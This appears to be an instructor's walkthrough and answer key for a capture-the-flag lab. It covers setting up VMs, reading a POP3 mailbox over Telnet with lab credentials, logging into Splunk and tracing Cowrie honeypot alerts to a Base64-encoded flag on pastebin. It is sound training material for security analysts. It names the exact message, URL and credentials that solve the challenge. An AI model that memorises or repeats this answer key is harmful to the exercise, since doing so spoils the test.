An organization’s monitoring system identified suspicious download activities captured in a honeypot that was named Cowrie. The event was recorded by the Splunk system, but the system cannot be accessed because its operator, who was the head of the security investigation team, was recently released from the company. You were hired as a security analyst not long after.

Due to the recent events, there wasn’t enough time to provide you with all the information required to access the system freely. However, the system administrator was able to provide you with access to the mail server, and told you that all the data needed to access the system is stored on that server.

Your objective is to connect to the Splunk system, investigate the events, and identify a suspicious message to obtain the FLAG.

• Double-click the CIT_Final OVA to import it.

• Deselect the USB Controller to prevent potential errors, and click Import.

• In the VirtualBox Manager click File and select Preferences and edit NatNetwork to use a 192.168.1.0/24 Network.

• Click Network and right-click NatNetwork and select edit to configure the network to use a 192.168.1.0/24 network.

• Right-click the Ubuntu CIT_Final VM and select Settings.

• Navigate to Network and make sure the adapter is set to NAT Network and named NatNetwork, with Allow VMs for Promiscuous Mode.

• Right-click the Windows 10 CIT_Final VM and select Settings.

• Navigate to Network, and for Attached to select the NAT Network adapter and named NatNetwork, with Allow VMs for Promiscuous Mode.

• Start both machines.

• Examine the IP address in the Ubuntu VM and write it down.

• In the Windows 10 VM, press Winkey + R, type cmd, and click OK.

• In the CMD, ping the Ubuntu machine to verify it is communicating.

The machine contains a honeypot that alerts Splunk when someone tries to use SSH to connect to the machine. If that happens too often, solving the challenge will be much more difficult for the students, since Splunk will still generate alerts whenever someone tries to connect via SSH.

• You can log in to the machine with the following credentials:
  • Username: janed
  • Password: toor

SSH is enabled using port 2332.

• Inspect the Ubuntu VM and note the message about the POP3 protocol.

• Which port does POP3 use?

POP3 communicates on port 110. 

• Use Telnet to connect to the POP3 service via Powershell. Were you successful? Why?

Search for Powershell, right-click it, and open it as administrator.
Use the command telnet 192.168.1.5 110 to try to connect to Ubuntu’s POP3.
Note that an error appears stating that Telnet is not installed.

• Install Telnet in the Windows 10 VM

Search for turn windows features on or off and open that option.
Select Telnet Client, and click OK to install it.

• Try to establish the connection again, login once connected.

Run the command telnet 192.168.1.5 110
To connect, enter user johnd and then pass toor.

• List the the existing emails and investigate them to search for interesting information.

Go through the email messages and look for anything interesting. Since we are dealing with a mail server, we can display the stored email messages on the server using the list command.
You may have to look through several messages before finding the email that contains the clue, this is the real-world aspect of the challenge.
The clues exists in the fourth message, open it using the retr command.
Note the URI and credentials provided in the email regarding Splunk. 

• Enter the provided URL and log in to the system.

Open the browser and browse to http://192.168.1.5:9080/
Note: Splunk uses the HTTP protocol, not HTTPS. If Splunk does not appear on the screen, perhaps the student tried to use the HTTPS protocol.
Use the credentials found in the email to log in to the system.

• In the platform, search for records of the download attempt, and investigate them to identify the potential sources.

In Splunk, click Search & Reporting to enter the log searching option.
Use the keyword download in the search, and set it to All time.
As you look through the logs, you will notice honeypot alerts related to cowrie. Add this search term and search again. The investigation may require checking several log entries before finding the one that contains the flag. This is a real-world aspect of the challenge.
Investigating these events will eventually lead to a specific set of alerts related to pastebin.com.

• Access the located sources to search for interesting information in them.

You will find multiple alets related to pastebin. Only one URL in the alerts holds the data with the flag.
The correct URL is: https://pastebin.com/raw/0cs1NHvh

• Decipher the messages located in the URLs and identify the flag.

The message ends with =, which means that it is probably Base64 encoded.
Browse to : https://www.base64decode.org/ and decode the message to identify the flag.

Congrats, you have finished CIT_FINAL successfully